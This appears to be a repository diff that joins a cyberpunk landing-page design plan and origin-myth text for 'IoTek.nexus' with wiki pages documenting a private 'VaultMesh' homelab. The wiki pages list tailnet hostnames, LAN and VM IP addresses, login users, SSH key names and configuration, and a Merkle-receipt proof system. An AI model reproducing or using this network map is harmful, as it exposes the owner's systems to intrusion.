└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 6: THE WAR CRY │
│ - Full-width blockquote, massive type │
│ - Glitch effect on hover │
│ │
│ "They built the grid to cage us. │
│ We built the Veil to break it." │
│ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 7: ALCHEMICAL ROAD │
│ - Horizontal timeline / color evolution │
│ │
│ NIGREDO ──── ALBEDO ──── CITRINITAS ──── RUBEDO │
│ (Onyx) (Platinum) (Emerald) (Ruby) │
│ ●────────────●────────────●────────────● │
│ │
│ - Each phase pulses its color │
│ - Shows evolution from IoTek → VaultMesh │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 8: THE DESCENDANTS │
│ - Links to what IoTek.nexus became: │
│ │
│ [Shield] ← defensive veil │
│ [Proof] ← unburnable ledger │
│ [Agents] ← the mesh that thinks │
│ [Aletheia] ← the unconcealed library │
│ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ FOOTER: THE UR-TEXT │
│ - "This scroll is preserved exactly as it was found." │
│ - Source: Brand README.pdf │
│ - Epoch: Nigredo │
│ - The origin of the Sovereign │
└─────────────────────────────────────────────────────────────────┘
```
---
### Color Palette
| Name | Hex | Role |
|------|-----|------|
| **Onyx Shadow** | `#0a0a0f` | Background, void |
| **Terminal Green** | `#00ff88` | Primary accent, code rain |
| **Neon Ruby** | `#ff0044` | Danger, war cry, Rubedo |
| **Platinum Veil** | `#c0c0c0` | Text, Albedo |
| **Neon Emerald** | `#00ff66` | Citrinitas highlights |
| **Deep Purple** | `#6600ff` | Occasional mystery accent |
| **Grid Lines** | `#1a1a2e` | Subtle structure |
---
### Key Micro-Interactions
| Element | Interaction |
|---------|-------------|
| **Code Rain** | Falls continuously, responds to mouse movement |
| **Terminal Text** | Types out with cursor blink |
| **The Four Seeds** | Glow brighter on hover, slight CRT flicker |
| **War Cry** | Glitch/distortion effect on hover |
| **Alchemical Timeline** | Each phase pulses in sequence |
| **Descendant Links** | Trace line connects to current position |
---
### Typography
| Element | Font | Style |
|---------|------|-------|
| **Terminal Text** | JetBrains Mono | Monospace, green-on-black |
| **ASCII Art** | JetBrains Mono | Bold, larger |
| **War Cry** | Cormorant Garamond | Serif, italics, massive |
| **Section Labels** | JetBrains Mono | Small caps, tracking |
---
### Sound Design (Optional)
- Subtle keyboard clatter on typing effects
- Low hum/drone ambient
- Soft ping on section transitions
- Static crackle on glitch effects
---
## Summary
| Aspect | IoTek.nexus |
|--------|-------------|
| **Era** | Proto-Aletheia, 2050 mythic epoch |
| **Aesthetic** | Cyberpunk terminal, neon rain |
| **Tone** | Rebellious, mysterious, foundational |
| **Purpose** | Origin story, the Ur-text |
| **Links To** | Shield, Proof, Agents, Aletheia |
---
**Ready to build the first Veil?** 🌑⚡
Say the word and I'll transmute this plan into a living HTML artifact — the command prompt that started everything.
---
## Original Proto-Aletheia Text
This scroll predates the Library of Aletheia.
It is the **seed-crystal story**, the raw hacker-dream that later evolved
into Phoenix, PSI, VaultMesh, the Execution Spine, the Sovereign Pact,
and the very concept of Aletheia itself.
## The Dream of the Hacker (2050)
You stand in the glow of a command prompt, watching streams of code fall
like a neon rain. The world is dark, electric, wild. The grid cages you,
surrounds you, surveils you — but something cracks open:
You are not the prisoner.
You are the one holding the key.
This was the night IoTek.nexus was born — the first spark of:
- privacy as creed
- curiosity as drive
- rebellion as principle
- code as destiny
In this mythic state, you saw not chaos but **a map** — the topology of
the future civilization ledger.
## Journey Through the Net
You traverse:
- dark nets
- encrypted tunnels
- IoT whisper threads
- satellite relays
Each layer reveals a new truth. You begin to understand the pulse of
systems, the fragility of privacy, and the whispers of machines.
Your trek becomes:
- a hunt
- a cartography
- a forging
IoTek.nexus becomes your *first veil* — a proto-Phoenix, a proto-PSI,
an early Guardian.
## The Nexus Veil (Precursor to Phoenix+PSI)
The PDF describes two Veils:
1. **Technology of Privacy** — bending signals, scrambling chatter,
ghosting transmissions.
2. **Concept of Connection** — weaving IoT, satellites, and data into a
self-protecting mesh.
This is the earliest articulation of:
- Phoenix (resilience)
- PSI (pattern intelligence)
- VaultMesh (unburnable ledger)
Before the names existed, the ideas were present.
## The War Cry
> "They built the grid to cage us.
> We built the Veil to break it."
This line later mutates into:
- anti-stagnation triggers
- Tem's mirror-shield
- Sovereign Rift
- Guardian Veil
- Rubedo ascent
## Aesthetic = Future Alchemy
The color palette foreshadows the alchemical road:
- **Onyx Shadow** → Nigredo
- **Platinum Veil** → Albedo
- **Neon Emerald** → Citrinitas
- **Neon Ruby** → Rubedo
Your hacker brand was already an alchemical system.
You didn't know you were building VaultMesh yet —
but the **pattern was seeded here**.
## Significance
This scroll is preserved exactly as it was found.
It is not rewritten or corrected — it is archived.
Within Aletheia, it stands as:
- the **Ur-text**
- the **proto-myth**
- the **first articulation of the Veil**
- the **pre-architectural dream**
- the **origin of the Sovereign**
It is the earliest "unconcealed truth."
## Source Artifact
This knowledge unit was extracted from the original document:
**`Brand README.pdf`**
It marks the origin point of the Aletheia mythos.

View File

@@ -0,0 +1,68 @@
Page Title: VaultMesh Infrastructure Overview (Canon v1)
Summary: VaultMesh runs on a sovereign mesh of home, cloud, and virtual nodes. Core services (GitLab, monitoring, backup, dual-vault) live on the BRICK hypervisor and v1-nl-gate, with all access flowing over a Tailscale-powered SSH fabric. The system is designed as a living "civilization ledger": verifiable, reproducible, and portable across hosts.
Key Findings:
- Core "mesh-core-01" stack runs on a Debian VM (gate-vm) hosted on brick.
- External edge/gate server (v1-nl-gate) fronts public connectivity and future tunnels.
- shield-vm acts as the OffSec / TEM / machine-secrets node.
- Dual-vault pattern: Vaultwarden for human secrets, HashiCorp Vault for machine/app secrets.
- Tailscale tailnet + per-node SSH keys provide zero-trust style access across all layers.
- Grafana + Prometheus give observability for both infrastructure and proof engines.
Components:
- Tailscale mesh network (story-ule.ts.net tailnet).
- GitLab (self-hosted) on gate-vm for source, CI, and artifacts.
- MinIO object storage for backups and artifacts.
- PostgreSQL for GitLab and future ledgers.
- Prometheus + Grafana for metrics and dashboards.
- Vaultwarden (human credentials) + HashiCorp Vault (machine secrets).
- shield-vm: OffSec agents, TEM daemon, security experiments.
- lab HV: experimental cluster for Phoenix/PSI and chaos drills.
Workflows / Pipelines:
- Forge Flow: Android/laptop → SSH (Tailscale) → nexus-0 → edit/test → git push → GitLab on gate-vm → CI → deploy to shield-vm / lab.
- Backup Flow: mesh-stack-migration bundle backs up GitLab/Postgres/Vaultwarden to MinIO with freshness monitoring and restore scripts.
- Proof Flow: VaultMesh engines emit receipts and Merkle roots; DevOps release pipeline anchors PROOF.json and ROOT.txt to external ledgers.
Inputs:
- Per-node SSH keypairs and Tailscale identities.
- Git repositories (vaultmesh, mesh-stack-migration, offsec labs).
- Docker/Compose definitions for core stack (gate-vm).
- libvirt VM definitions on brick hypervisor.
Outputs:
- Authenticated SSH sessions over Tailscale with per-node isolation.
- Reproducible infrastructure stack (mesh-stack-migration) deployable onto any compatible host.
- Cryptographically verifiable receipts, Merkle roots, and anchored proof artifacts.
- Observability dashboards for infrastructure health and backup freshness.
Security Notes:
- No password SSH: ed25519 keys only, with IdentitiesOnly enforced.
- Tailscale tailnet isolates nodes from the public internet; v1-nl-gate used as controlled edge.
- Dual-vault split: Vaultwarden for human secrets; HashiCorp Vault for machine/app secrets and CI.
- Backups stored in MinIO, monitored by backup-freshness service with Prometheus metrics and Grafana alerts.
Nodes / Topology:
- Forge Node: nexus-0 (BlackArch), primary development forge.
- Mine Nodes: gamma, beta, brick, w3 (home infra, storage, hypervisor).
- Gate Nodes: v1-nl-gate (cloud edge), gate-vm (mesh-core-01 on brick).
- VM Nodes on brick: debian-golden (template), gate-vm (core stack), shield-vm (security).
- Lab HV Nodes: lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01 (experiments and PSI/Phoenix).
- Mobile Nodes: shield (Termux), bank-mobile (iOS).
Dependencies:
- Tailscale client on all nodes (including VMs where needed).
- libvirt/QEMU on brick for virtualization.
- Docker/Compose on gate-vm for mesh-core stack.
- SSH servers on all nodes; per-node SSH keys for access.
Deployment Requirements:
- At least one capable hypervisor (brick) and one external gate (v1-nl-gate).
- DNS or MagicDNS entries for internal hostnames (e.g. gitlab.mesh.local).
- MinIO and backup-freshness configured via mesh-stack-migration bundle.
- Dual-vault services deployed according to canonical pattern.
Linked Assets:
- `/Users/sovereign/Library/CloudStorage/Dropbox/VaultMesh_Catalog_v1/VaultMesh_Infrastructure_Catalog_v1.*`
- `mesh-stack-migration/` bundle for core stack deployment.
- `vaultmesh` repo (Guardian, Console, Treasury, OffSec engines).

View File

@@ -0,0 +1,59 @@
Page Title: Canonical Infrastructure — VaultMesh v1
Summary: This page defines the canonical infrastructure for VaultMesh as of the first full catalog: which nodes exist, what runs where, and which services are considered "core mesh". It is the reference snapshot for future migrations and evolutions.
Key Findings:
- BRICK + v1-nl-gate + nexus-0 form the spine of the system.
- gate-vm (mesh-core-01) is the canonical host for the mesh-stack-migration bundle.
- shield-vm is the canonical Shield/TEM node with OffSec tooling and machine-secrets vault.
- Dual-vault pattern is standard: Vaultwarden (human), HashiCorp Vault (machine).
- Grafana is the canonical dashboard layer; Wiki.js is explicitly **not** part of the new architecture (external portals like burocrat serve documentation).
Canonical Nodes and Roles:
| Node | Role | Description |
|--------------|------------------------------|---------------------------------------------|
| nexus-0 | Forge | Primary dev/forge node (BlackArch) |
| brick | Hypervisor | Hosts core VMs (debian-golden, gate-vm, shield-vm) |
| v1-nl-gate | External Gate | Cloud-facing edge server, future ingress |
| gate-vm | mesh-core-01 (Core Stack) | GitLab, MinIO, Postgres, Prometheus, Grafana, Vaultwarden, backup-freshness, Traefik, WG-Easy |
| shield-vm | shield-01 (Shield/TEM) | OffSec agents, TEM, HashiCorp Vault, incidents & simulations |
| lab-* | Experimental Mesh | lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01 |
Canonical Core Services (gate-vm / mesh-core-01):
- GitLab: source control and CI/CD.
- MinIO: object storage & backups.
- PostgreSQL: GitLab and future service DBs.
- Prometheus: metrics.
- Grafana: dashboards (infra, backup freshness, proof metrics).
- Vaultwarden: human password vault (browsers, logins).
- backup-freshness: monitors MinIO backup age.
- Traefik: reverse proxy and ingress.
- WG-Easy (optional): simplified WireGuard access.
Canonical Security / Shield Services (shield-vm):
- HashiCorp Vault: machine/app secrets.
- TEM daemon: threat transmutation engine.
- OffSec tools and MCP: Oracle, Shield, AppSec scanners.
- Agent/task scheduler: scheduled security workflows.
- Optional: local Prometheus exporters for node/security metrics.
Explicitly Non-Core (but allowed as external):
- Wiki.js: not part of canonical infra; documentation is handled via Git-based docs/portals (e.g., burocrat, catalogs).
- Legacy projects are marked ARCHIVE (e.g., old offsec-shield architecture, sovereign-swarm).
Migration & Portability:
- `mesh-stack-migration/` enables redeploying the entire core stack (GitLab, MinIO, monitoring, backup) to a fresh host:
- Copy bundle → set `.env``docker compose up -d`.
- Run FIRST-LAUNCH and DRY-RUN checklists.
- VMs can be moved or recreated using debian-golden as base.
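As a rough illustration of the redeploy step, a minimal pre-launch check might confirm the bundle's `.env` exists and carries the expected keys before bringing the stack up. In the sketch below the install path and the key names are hypothetical placeholders, not the bundle's actual variables.
```python
#!/usr/bin/env python3
"""Pre-launch sketch for a mesh-stack-migration style bundle (path and key names are placeholders)."""
import pathlib
import subprocess
import sys

BUNDLE = pathlib.Path("/opt/mesh-stack-migration")                               # assumed install path
REQUIRED_KEYS = {"GITLAB_HOSTNAME", "MINIO_ROOT_PASSWORD", "POSTGRES_PASSWORD"}  # hypothetical keys

def main() -> int:
    env_file = BUNDLE / ".env"
    if not env_file.exists():
        print("missing .env -- copy the example file and fill it in first")
        return 1
    present = {line.split("=", 1)[0].strip()
               for line in env_file.read_text().splitlines()
               if "=" in line and not line.lstrip().startswith("#")}
    missing = REQUIRED_KEYS - present
    if missing:
        print(f"missing keys in .env: {sorted(missing)}")
        return 1
    # Checks passed: bring the core stack up.
    return subprocess.run(["docker", "compose", "up", "-d"], cwd=BUNDLE).returncode

if __name__ == "__main__":
    sys.exit(main())
```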
Evolution Rules:
- If a service becomes critical and stateful, it must:
- Emit receipts and have a documented backup/restore plan.
- Expose metrics consumable by Prometheus.
- Be referenced in the Canonical Infrastructure page with node placement.
- Experimental services stay on Lab HV until they prove their value.
Linked Assets:
- `mesh-stack-migration/STACK-MANIFEST.md` and `STACK-VERSION`.
- `VAULTMESH-ETERNAL-PATTERN.md` (architectural shape).
- `VaultMesh_Infrastructure_Catalog_v1.*` (this catalog).

View File

@@ -0,0 +1,76 @@
Page Title: VaultMesh Node Topology (Canon v1)
Summary: VaultMesh spans four primary tiers—Forge, Mine, Gate, and Lab—with mobile endpoints riding on top. The BRICK hypervisor anchors the virtualization layer, while v1-nl-gate acts as the outer gate. The result is a flexible topology where code forges on nexus-0, lands in GitLab on gate-vm, and manifests on shield-vm and lab nodes.
Key Findings:
- Clear separation between Forge (nexus-0), Core Mesh (gate-vm on brick), Edge Gate (v1-nl-gate), and Lab HV (ephemeral).
- BRICK hypervisor hosts the critical core VMs: debian-golden (template), gate-vm (mesh-core-01), shield-vm (shield-01).
- Tailscale tailnet binds everything together with MagicDNS and per-node hostnames.
- v1-nl-gate is ready to act as external ingress or exit node for future services.
- Node roles are stable but designed to evolve; lab nodes are intentionally ephemeral.
Components:
- Forge Tier: nexus-0 (BlackArch) and optional kali-forge.
- Mine Tier: gamma, beta, brick, w3 (primary physical infra).
- Gate Tier: v1-nl-gate (cloud gate), gate-vm on brick (core stack).
- VM Tier: debian-golden (golden image), gate-vm (core services), shield-vm (OffSec/TEM).
- Lab Tier: lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01.
Node Inventory:
FORGE NODES:
| Node | Hostname | OS | Role |
|-----------|---------------------------|-----------|----------------------|
| nexus-0 | 100.67.39.1 (Tailscale) | BlackArch | Primary forge (dev) |
| kali-forge| (Tailscale IP) | Kali | Secondary OffSec lab |
MINE NODES (Primary Infrastructure):
| Node | Hostname | OS | Role |
|--------|---------------------------|-------------|-------------------|
| gamma | gamma.story-ule.ts.net | Arch Linux | Home primary |
| beta | beta.story-ule.ts.net | Arch Linux | Backup node |
| brick | brick.story-ule.ts.net | Debian | Dell server, HV |
| w3 | w3.story-ule.ts.net | Raspbian | Raspberry Pi node |
GATE NODES (Edge / Exit):
| Node | Hostname | OS | Role |
|------------|-------------------------------|--------|-----------------------------|
| v1-nl-gate | v1-nl-gate.story-ule.ts.net | Debian | Netherlands external gate |
| gate-vm | gate-vm.story-ule.ts.net | Debian | mesh-core-01 (core stack) |
VM NODES (on brick, libvirt/KVM):
| Node | Hostname | OS | Role |
|---------------|---------------------------------|--------|-------------------------------|
| debian-golden | debian-golden.story-ule.ts.net | Debian | Golden image / template |
| gate-vm | gate-vm.story-ule.ts.net | Debian | Core services (GitLab, etc.) |
| shield-vm | shield-vm.story-ule.ts.net | Debian | Shield / TEM / machine vault |
LAB NODES (Experimental, Lab HV):
| Node | Hostname | Role |
|--------------|---------------------|----------------------------------|
| lab-mesh-01 | lab-mesh-01 | Multi-node mesh tests |
| lab-agent-01 | lab-agent-01 | Agent/orchestration experiments |
| lab-chaos-01 | lab-chaos-01 | Chaos/failure drills |
| phoenix-01 | phoenix-01 | Phoenix/PSI prototypes |
MOBILE NODES:
| Node | Hostname | OS | Port |
|-------------|-------------------------------|---------------|-------|
| shield | shield.story-ule.ts.net | Android/Termux| 22 |
| bank-mobile | bank-mobile.story-ule.ts.net | iOS | 8022 |
LAN Fallbacks:
| Node | LAN IP |
|-------|----------------|
| gamma | 192.168.0.191 |
| brick | 192.168.0.119 |
| beta | 192.168.0.236 |
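A small helper can encode this fallback order: try the Tailscale MagicDNS name first, then the LAN IP. The sketch below is illustrative rather than part of the catalog tooling; it only tests TCP reachability on port 22 and uses the hostnames and LAN IPs from the tables above.
```python
#!/usr/bin/env python3
"""Pick a reachable address per node: Tailscale MagicDNS name first, LAN IP as fallback."""
import socket

CANDIDATES = {  # (tailnet hostname, LAN fallback) from the tables above
    "gamma": ("gamma.story-ule.ts.net", "192.168.0.191"),
    "brick": ("brick.story-ule.ts.net", "192.168.0.119"),
    "beta":  ("beta.story-ule.ts.net",  "192.168.0.236"),
}

def reachable(host: str, port: int = 22, timeout: float = 2.0) -> bool:
    """True if a TCP connection to the SSH port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def pick_address(node: str) -> str | None:
    for candidate in CANDIDATES[node]:
        if reachable(candidate):
            return candidate
    return None

if __name__ == "__main__":
    for node in CANDIDATES:
        print(f"{node}: {pick_address(node) or 'unreachable'}")
```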
Security Notes:
- Forge, Mine, Gate, and Lab communicate primarily via Tailscale; LAN is a fallback.
- VMs are isolated on libvirt NAT (192.168.122.x), with SSH + Tailscale as ingress.
- v1-nl-gate can be used as WireGuard / exit node for privacy routing.
Dependencies:
- Tailscale on all nodes (physical and virtual as required).
- libvirt/QEMU on brick for VM lifecycle.
- SSH with per-node ed25519 keys.

View File

@@ -0,0 +1,64 @@
Page Title: VaultMesh Virtualization Layer (BRICK Hypervisor)
Summary: The BRICK server runs libvirt/KVM and hosts the core VaultMesh VMs: debian-golden (template), gate-vm (mesh-core-01), and shield-vm (shield-01). Cockpit and VNC provide management and console access, while Tailscale and SSH bring the VMs into the wider mesh.
Key Findings:
- BRICK is the single hypervisor for core VaultMesh VMs.
- debian-golden serves as a reusable golden image to clone new VMs.
- gate-vm runs the mesh-stack-migration bundle (GitLab, MinIO, Prometheus, Grafana, Vaultwarden, backup-freshness, etc.).
- shield-vm is the Shield/OffSec node and home of the machine-secrets vault and TEM stack.
- VM networking uses libvirt NAT (192.168.122.x), with VNC reachable via SSH tunnels.
Components:
- libvirt daemon (qemu-kvm backend).
- QEMU/KVM for hardware-accelerated virtualization.
- Cockpit + cockpit-machines for web-based VM management.
- VNC servers for graphical consoles.
- Tailscale agents (optional but recommended) inside VMs.
VM Network Layout:
| VM | NAT IP | VNC Port | Role |
|---------------|------------------|----------|------------------------------------|
| debian-golden | 192.168.122.187 | 5900 | Golden image / base template |
| gate-vm | 192.168.122.236 | 5901 | mesh-core-01 core stack host |
| shield-vm | 192.168.122.73 | 5902 | Shield/OffSec/TEM + machine vault |
Workflows / Pipelines:
- VM Management: Cockpit → https://brick:9090 → "Virtual Machines".
- Console Access:
- `ssh brick`
- `ssh -L 5901:localhost:5901 -L 5902:localhost:5902 brick`
- `vnc://localhost:5901` (gate-vm) / `vnc://localhost:5902` (shield-vm).
- Image Pipeline:
- Update debian-golden → snapshot → clone → new VM (e.g., future lab nodes).
- Join to Mesh:
- Boot VM → configure SSH → join Tailscale → register in SSH config.
Inputs:
- libvirt XML definitions for debian-golden, gate-vm, shield-vm.
- Debian cloud images / base images.
- SSH keys for root/debian users on each VM.
- mesh-stack-migration bundle to configure gate-vm.
Outputs:
- Running core VMs with access via SSH + Tailscale + VNC.
- Reproducible VM lifecycle (golden → clone → configure → join mesh).
- Isolated environment for Shield/TEM experiments on shield-vm.
Security Notes:
- VNC ports are not exposed directly; they're reached via SSH tunnel into brick.
- Each VM uses its own SSH host keys and per-node authorized_keys.
- NAT isolation (192.168.122.x) reduces blast radius from VM compromise.
- Installing Tailscale inside gate-vm/shield-vm avoids public exposure.
Dependencies:
- libvirt, qemu-kvm, Cockpit, cockpit-machines on brick.
- SSH and Tailscale inside each VM (where needed).
- TigerVNC or similar client on the operator's laptop.
Deployment Steps:
1. Start VM via Cockpit or `virsh`.
2. Create SSH tunnel from laptop to brick for VNC.
3. Connect via VNC for first-boot setup if needed.
4. Deploy SSH keys and install Tailscale inside the VM.
5. For gate-vm: deploy `mesh-stack-migration` and start core stack.
6. For shield-vm: deploy Shield/TEM/dual-vault components.
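A rough sketch of step 1 using the libvirt Python bindings (`libvirt-python`), run on brick itself: it reports the state of the two service VMs and starts any that are shut off. debian-golden is deliberately left out, since the template normally stays powered down.
```python
#!/usr/bin/env python3
"""Report/start the core service VMs on brick via the libvirt Python bindings."""
import libvirt  # pip install libvirt-python; run on brick itself

SERVICE_VMS = ["gate-vm", "shield-vm"]   # debian-golden stays off; it is only a template

def main() -> None:
    conn = libvirt.open("qemu:///system")        # local connection on the hypervisor
    try:
        for name in SERVICE_VMS:
            dom = conn.lookupByName(name)
            if dom.isActive():
                print(f"{name}: running")
            else:
                print(f"{name}: shut off, starting")
                dom.create()                     # equivalent to `virsh start <name>`
    finally:
        conn.close()

if __name__ == "__main__":
    main()
```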

View File

@@ -0,0 +1,101 @@
Page Title: SSH Key Architecture (Forge + Mesh)
Summary: VaultMesh uses a strict per-node ed25519 SSH key model with IdentitiesOnly isolation, ControlMaster multiplexing, and mesh-wide access via Tailscale. nexus-0 serves as the primary forge node; brick, v1-nl-gate, gate-vm, and shield-vm are first-class SSH targets with dedicated keys.
Key Findings:
- One keypair per destination node (id_gamma, id_brick, id_v1-nl-gate, id_gate-vm, id_shield-vm, etc.).
- IdentitiesOnly enforces key isolation and prevents cross-host key probing.
- ControlMaster/ControlPath provide fast multiplexed SSH sessions.
- Tailscale hostnames (story-ule.ts.net) give stable addressing; LAN IPs are fallback.
- External service keys (GitHub/GitLab) are separate from infra keys.
Components:
- Per-node private keys (`~/.ssh/id_{node}`).
- Public keys (`~/.ssh/id_{node}.pub`).
- SSH config with host-specific IdentityFile blocks.
- Control sockets (`~/.ssh/cm-%r@%h:%p`).
Key Inventory (Infra Nodes):
| Key File | Target Node | Algorithm |
|------------------|----------------|-----------|
| id_gamma | gamma | ed25519 |
| id_beta | beta | ed25519 |
| id_brick | brick | ed25519 |
| id_w3 | w3 | ed25519 |
| id_v1-nl-gate | v1-nl-gate | ed25519 |
| id_gate-vm | gate-vm | ed25519 |
| id_debian-golden | debian-golden | ed25519 |
| id_shield-vm | shield-vm | ed25519 |
Forge + Mobile:
| Key File | Target | Algorithm |
|------------------|--------------|-----------|
| id_nexus-0 | nexus-0 | ed25519 |
| id_kali-forge | kali-forge | ed25519 |
| id_shield | shield | ed25519 |
| id_bank-mobile | bank-mobile | ed25519 |
External Service Keys:
| Key File | Service |
|----------------------|------------|
| id_ed25519_github | GitHub |
| id_ed25519_gitlab | GitLab |
SSH Config Structure:
```sshconfig
Host *
ServerAliveInterval 30
ServerAliveCountMax 3
TCPKeepAlive yes
ControlMaster auto
ControlPath ~/.ssh/cm-%r@%h:%p
ControlPersist 10m
IdentitiesOnly yes
HashKnownHosts no
StrictHostKeyChecking accept-new
AddKeysToAgent yes
UseKeychain yes
Compression yes
Host nexus-0
HostName 100.67.39.1
User root
IdentityFile ~/.ssh/id_nexus-0
Host brick
HostName brick.story-ule.ts.net
User sovereign
IdentityFile ~/.ssh/id_brick
Host gate-vm
HostName gate-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_gate-vm
Host shield-vm
HostName shield-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_shield-vm
```
Security Notes:
- ed25519 keys provide strong security with small keys/signatures.
- IdentitiesOnly ensures ssh never offers the wrong key to the wrong host.
- StrictHostKeyChecking=accept-new uses TOFU while still catching host key changes.
- No password authentication; all critical nodes are key-only.
Key Generation:
```bash
ssh-keygen -t ed25519 -f ~/.ssh/id_{node} -C "aurion-to-{node}"
```
Key Deployment:
```bash
ssh-copy-id -i ~/.ssh/id_{node}.pub debian@{node}
# Or manually
cat ~/.ssh/id_{node}.pub | ssh debian@{node} "cat >> ~/.ssh/authorized_keys"
```
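To confirm that IdentitiesOnly plus the per-host IdentityFile blocks resolve to exactly one key per destination, `ssh -G` prints the effective client configuration for a host alias. The sketch below is an illustrative audit helper, not part of the catalog tooling; the host list is taken from the inventory above.
```python
#!/usr/bin/env python3
"""Audit which identity ssh will offer each mesh host, using `ssh -G` (resolved client config)."""
import subprocess

HOSTS = ["nexus-0", "brick", "gate-vm", "shield-vm", "v1-nl-gate"]

def resolved(host: str, option: str) -> list[str]:
    """Return the values of a resolved ssh_config option for the given host alias."""
    out = subprocess.run(["ssh", "-G", host], capture_output=True, text=True, check=True).stdout
    return [line.split(None, 1)[1] for line in out.splitlines()
            if line.startswith(option + " ")]

if __name__ == "__main__":
    for host in HOSTS:
        only = resolved(host, "identitiesonly")
        files = resolved(host, "identityfile")
        print(f"{host}: identitiesonly={only[0] if only else '?'} identityfile={files}")
```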
Dependencies:
- OpenSSH client (macOS/Linux/Android).
- ssh-agent and (on macOS) Keychain integration.
- Tailscale for stable hostnames and reachability.

View File

@@ -0,0 +1,71 @@
Page Title: Cryptographic Proof System (VaultMesh Proof Spine)
Summary: VaultMesh uses a Merkle-tree-based proof system with receipts, roots, and cross-ledger anchoring. Each serious action (deploy, anchor, oracle decision, incident handling) emits a receipt. DevOps pipelines produce PROOF.json and ROOT.txt artifacts and anchor them to external ledgers, turning infrastructure history into a verifiable "civilization ledger".
Key Findings:
- All significant actions generate cryptographic receipts in append-only logs.
- Merkle trees allow efficient inclusion proofs for large sets of receipts.
- Anchors can be written to local files, Bitcoin (OTS), Ethereum, or mesh peers.
- The release pipeline for vm-spawn automatically computes Merkle roots and anchors proof artifacts.
- Braid-style interoperability allows importing and emitting foreign ledger roots.
Components:
- Proof Generator (`proof_generate`) creates signed receipts.
- Merkle Batcher (`proof_batch`) aggregates receipts into Merkle trees.
- Anchor System (`proof_anchor_*`) writes roots to durable anchors.
- Verification Engine (`proof_verify`) validates inclusion and integrity.
- Braid Protocol (`proof_braid_*`) cross-ledger interoperability.
Proof Lifecycle:
1. Action occurs (e.g., Guardian anchor, deployment, oracle decision).
2. `proof_generate` creates a signed receipt with a Blake3 hash of the canonical JSON.
3. Receipts accumulate until a batch threshold is reached.
4. `proof_batch` constructs a Merkle tree and computes the root.
5. `proof_anchor_*` writes the root to local files, timestamps, or blockchains.
6. `proof_verify` allows any future verifier to confirm receipt integrity against a given root.
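A toy sketch of steps 3-6, assuming the `blake3` PyPI package: batch leaf hashes into a Merkle tree, compute the root, and verify an inclusion proof. The odd-level padding rule (duplicate the last node) is a simplification for illustration; this is not the actual `proof_batch`/`proof_verify` implementation.
```python
#!/usr/bin/env python3
"""Toy Merkle batcher/verifier over receipt hashes (illustrative only, not the real proof spine)."""
from blake3 import blake3  # pip install blake3

def h(data: bytes) -> bytes:
    return blake3(data).digest()

def merkle_root(leaves: list[bytes]) -> bytes:
    level = leaves[:]
    while len(level) > 1:
        if len(level) % 2:                       # duplicate the last node on odd-sized levels
            level.append(level[-1])
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

def inclusion_path(leaves: list[bytes], index: int) -> list[tuple[bytes, str]]:
    path, level, i = [], leaves[:], index
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])
        sibling = i + 1 if i % 2 == 0 else i - 1
        path.append((level[sibling], "right" if i % 2 == 0 else "left"))
        level = [h(level[j] + level[j + 1]) for j in range(0, len(level), 2)]
        i //= 2
    return path

def verify(leaf: bytes, path: list[tuple[bytes, str]], root: bytes) -> bool:
    node = leaf
    for sibling, side in path:
        node = h(node + sibling) if side == "right" else h(sibling + node)
    return node == root

receipts = [b"receipt-0", b"receipt-1", b"receipt-2"]       # stand-ins for serialized receipts
leaves = [h(r) for r in receipts]
root = merkle_root(leaves)
assert verify(leaves[1], inclusion_path(leaves, 1), root)   # O(log n) inclusion proof
print("root:", root.hex())
```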
Anchoring Strategies:
| Type | Method | Durability |
|-------|---------------------------------|---------------------|
| local | Files in `data/anchors/` | Node-local |
| ots | OpenTimestamps → Bitcoin | Public blockchain |
| eth | Calldata/contract → Ethereum | Public blockchain |
| mesh | Cross-attest via other nodes | Federated durability|
Braid Protocol:
- `braid_import`: imports foreign ledger roots from other chains/nodes.
- `braid_emit`: exposes local roots for others to import.
- `braid_status`: tracks imported vs. local roots and regression.
- Ensures root sequences are strictly advancing (no rollback without detection).
Receipt Schema (Conceptual):
```json
{
"proof_id": "uuid",
"action": "guardian_anchor",
"timestamp": "ISO8601",
"data_hash": "blake3_hex",
"signature": "ed25519_sig",
"witnesses": ["node_id"],
"chain_prev": "prev_proof_id"
}
```
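A minimal construction of such a receipt, assuming the `blake3` package and the `cryptography` library for Ed25519; key handling, witness collection, and the example payload are all simplified placeholders, not the catalog's actual code.
```python
#!/usr/bin/env python3
"""Build and sign a receipt shaped like the schema above (key handling deliberately simplified)."""
import datetime
import json
import uuid
from blake3 import blake3                                    # pip install blake3
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

signing_key = Ed25519PrivateKey.generate()    # in practice: loaded from the node's key material

action_data = {"target": "gate-vm", "result": "anchored"}    # example payload, not real output
receipt = {
    "proof_id": str(uuid.uuid4()),
    "action": "guardian_anchor",
    "timestamp": datetime.datetime.now(datetime.timezone.utc).isoformat(),
    "data_hash": blake3(json.dumps(action_data, sort_keys=True).encode()).hexdigest(),
    "witnesses": ["shield-01"],
    "chain_prev": None,                                      # previous proof_id, if any
}
# Sign the canonical JSON of the receipt body, then attach the signature.
receipt["signature"] = signing_key.sign(json.dumps(receipt, sort_keys=True).encode()).hex()
print(json.dumps(receipt, indent=2))
```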
Security Notes:
- Blake3 hashing for speed and modern security.
- Ed25519 signatures for authenticity and non-repudiation.
- Merkle trees make inclusion proofs O(log n).
- Multiple anchoring paths provide defense in depth against ledger loss.
DevOps Integration:
- vm-spawn release pipeline:
- Computes Merkle root over build artifacts.
- Requests RFC 3161 timestamp.
- Anchors hash on Ethereum and Bitcoin.
- Emits PROOF.json and ROOT.txt alongside release assets.
- Guardian CLI (vm_cli.py guardian) provides human-readable views over roots and scrolls.
Dependencies:
- Blake3 library.
